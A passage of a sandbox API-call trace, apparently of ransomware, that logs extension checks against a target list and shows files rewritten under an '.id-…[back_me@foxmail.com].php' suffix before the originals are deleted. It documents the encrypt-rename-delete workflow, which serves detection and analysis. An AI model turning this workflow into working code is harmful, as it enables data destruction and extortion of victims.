(lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.813] lstrlenW (lpString=".ppt") returned 4 [0048.813] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.813] lstrlenW (lpString=".zip") returned 4 [0048.813] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.813] lstrlenW (lpString=".rar") returned 4 [0048.813] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.813] lstrlenW (lpString=".bz2") returned 4 [0048.813] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.813] lstrlenW (lpString=".7z") returned 3 [0048.813] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.813] lstrlenW (lpString=".dbf") returned 4 [0048.813] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.813] lstrlenW (lpString=".1cd") returned 4 [0048.813] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.813] lstrlenW (lpString=".jpg") returned 4 [0048.813] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.813] lstrlenW (lpString=".doc") returned 4 [0048.813] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.814] lstrlenW (lpString=".docx") returned 5 [0048.814] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.814] lstrlenW (lpString=".pdf") returned 4 [0048.814] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.814] lstrlenW (lpString=".xls") returned 4 [0048.814] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.814] lstrlenW (lpString=".xlsx") returned 5 [0048.814] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.814] lstrlenW (lpString=".ppt") returned 4 [0048.814] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.814] lstrlenW (lpString=".zip") returned 4 [0048.814] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.814] lstrlenW (lpString=".rar") returned 4 [0048.814] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.814] lstrlenW (lpString=".bz2") returned 4 [0048.814] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.814] lstrlenW (lpString=".7z") returned 3 [0048.814] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.814] lstrlenW (lpString=".dbf") returned 4 [0048.814] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.814] lstrlenW (lpString=".1cd") returned 4 [0048.814] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.814] lstrlenW (lpString=".jpg") returned 4 [0048.814] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.814] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0048.815] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.815] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=33479) returned 1 [0048.815] CloseHandle (hObject=0x200) returned 1 [0048.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 0x20 [0048.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.815] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.815] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.816] GetLastError () returned 0x0 [0048.816] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x82c7, lpOverlapped=0x0) returned 1 [0048.818] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x82d0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x82d0, lpOverlapped=0x0) returned 1 [0048.819] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.819] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.819] SetEndOfFile (hFile=0x218) returned 1 [0048.819] CloseHandle (hObject=0x218) returned 1 [0048.819] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.819] SetEndOfFile (hFile=0x200) returned 1 [0048.820] CloseHandle (hObject=0x200) returned 1 [0048.820] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.821] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 1 [0048.821] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.821] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.821] lstrlenW (lpString=".doc") returned 4 [0048.821] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.821] lstrlenW (lpString=".docx") returned 5 [0048.821] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.821] lstrlenW (lpString=".pdf") returned 4 [0048.821] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.821] lstrlenW (lpString=".xls") returned 4 [0048.821] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.821] lstrlenW (lpString=".xlsx") returned 5 [0048.821] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.821] lstrlenW (lpString=".ppt") returned 4 [0048.821] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.821] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.821] lstrlenW (lpString=".zip") returned 4 [0048.821] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.821] lstrlenW (lpString=".rar") returned 4 [0048.821] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.821] lstrlenW (lpString=".bz2") returned 4 [0048.821] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.821] lstrlenW (lpString=".7z") returned 3 [0048.821] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.821] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.821] lstrlenW (lpString=".dbf") returned 4 [0048.821] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.821] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.822] lstrlenW (lpString=".1cd") returned 4 [0048.822] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.822] lstrlenW (lpString=".jpg") returned 4 [0048.822] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.822] lstrlenW (lpString=".doc") returned 4 [0048.822] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.822] lstrlenW (lpString=".docx") returned 5 [0048.822] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.822] lstrlenW (lpString=".pdf") returned 4 [0048.822] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.822] lstrlenW (lpString=".xls") returned 4 [0048.822] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.822] lstrlenW (lpString=".xlsx") returned 5 [0048.822] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.822] lstrlenW (lpString=".ppt") returned 4 [0048.822] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.822] lstrlenW (lpString=".zip") returned 4 [0048.822] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.822] lstrlenW (lpString=".rar") returned 4 [0048.822] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.822] lstrlenW (lpString=".bz2") returned 4 [0048.822] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.822] lstrlenW (lpString=".7z") returned 3 [0048.822] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.822] lstrlenW (lpString=".dbf") returned 4 [0048.822] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.822] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.822] lstrlenW (lpString=".1cd") returned 4 [0048.822] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.823] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0048.823] lstrlenW (lpString=".jpg") returned 4 [0048.823] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.823] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.823] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.823] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.823] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1675) returned 1 [0048.823] CloseHandle (hObject=0x200) returned 1 [0048.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif")) returned 0x20 [0048.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.823] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.823] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.824] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0049.202] GetLastError () returned 0x0 [0049.202] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x68b, lpOverlapped=0x0) returned 1 [0049.203] WriteFile (in: hFile=0x1c0, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x690, lpOverlapped=0x0) returned 1 [0049.205] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.205] WriteFile (in: hFile=0x1c0, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.205] SetEndOfFile (hFile=0x1c0) returned 1 [0049.205] CloseHandle (hObject=0x1c0) returned 1 [0049.205] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.205] SetEndOfFile (hFile=0x200) returned 1 [0049.206] CloseHandle (hObject=0x200) returned 1 [0049.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.206] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif")) returned 1 [0049.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.206] lstrlenW (lpString=".doc") returned 4 [0049.206] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.206] lstrlenW (lpString=".docx") returned 5 [0049.206] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.206] lstrlenW (lpString=".pdf") returned 4 [0049.206] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.206] lstrlenW (lpString=".xls") returned 4 [0049.207] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.207] lstrlenW (lpString=".xlsx") returned 5 [0049.207] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.207] lstrlenW (lpString=".ppt") returned 4 [0049.207] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.207] lstrlenW (lpString=".zip") returned 4 [0049.207] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.207] lstrlenW (lpString=".rar") returned 4 [0049.207] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.207] lstrlenW (lpString=".bz2") returned 4 [0049.207] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.207] lstrlenW (lpString=".7z") returned 3 [0049.207] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.207] lstrlenW (lpString=".dbf") returned 4 [0049.207] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.207] lstrlenW (lpString=".1cd") returned 4 [0049.207] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.207] lstrlenW (lpString=".jpg") returned 4 [0049.207] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.207] lstrlenW (lpString=".doc") returned 4 [0049.207] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.207] lstrlenW (lpString=".docx") returned 5 [0049.207] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.207] lstrlenW (lpString=".pdf") returned 4 [0049.207] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.207] lstrlenW (lpString=".xls") returned 4 [0049.207] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.208] lstrlenW (lpString=".xlsx") returned 5 [0049.208] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.208] lstrlenW (lpString=".ppt") returned 4 [0049.208] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.208] lstrlenW (lpString=".zip") returned 4 [0049.208] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.208] lstrlenW (lpString=".rar") returned 4 [0049.208] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.208] lstrlenW (lpString=".bz2") returned 4 [0049.208] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.208] lstrlenW (lpString=".7z") returned 3 [0049.208] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.208] lstrlenW (lpString=".dbf") returned 4 [0049.208] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.208] lstrlenW (lpString=".1cd") returned 4 [0049.208] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0049.208] lstrlenW (lpString=".jpg") returned 4 [0049.208] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.208] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0049.208] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0049.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.209] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=2668) returned 1 [0049.209] CloseHandle (hObject=0x200) returned 1 [0049.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif")) returned 0x20 [0049.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.209] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.209] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0049.213] GetLastError () returned 0x0 [0049.213] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xa6c, lpOverlapped=0x0) returned 1 [0049.214] WriteFile (in: hFile=0x198, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xa70, lpOverlapped=0x0) returned 1 [0049.215] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.215] WriteFile (in: hFile=0x198, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.215] SetEndOfFile (hFile=0x198) returned 1 [0049.215] CloseHandle (hObject=0x198) returned 1 [0049.216] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.216] SetEndOfFile (hFile=0x200) returned 1 [0049.216] CloseHandle (hObject=0x200) returned 1 [0049.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.217] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif")) returned 1 [0049.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 73 [0049.217] lstrlenW (lpString=".doc") returned 4 [0049.217] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.217] lstrlenW (lpString=".docx") returned 5 [0049.217] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.217] lstrlenW (lpString=".pdf") returned 4 [0049.217] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.217] lstrlenW (lpString=".xls") returned 4 [0049.217] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.217] lstrlenW (lpString=".xlsx") returned 5 [0049.217] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.217] lstrlenW (lpString=".ppt") returned 4 [0049.217] lstrcmpiW (lpString1=".ppt", 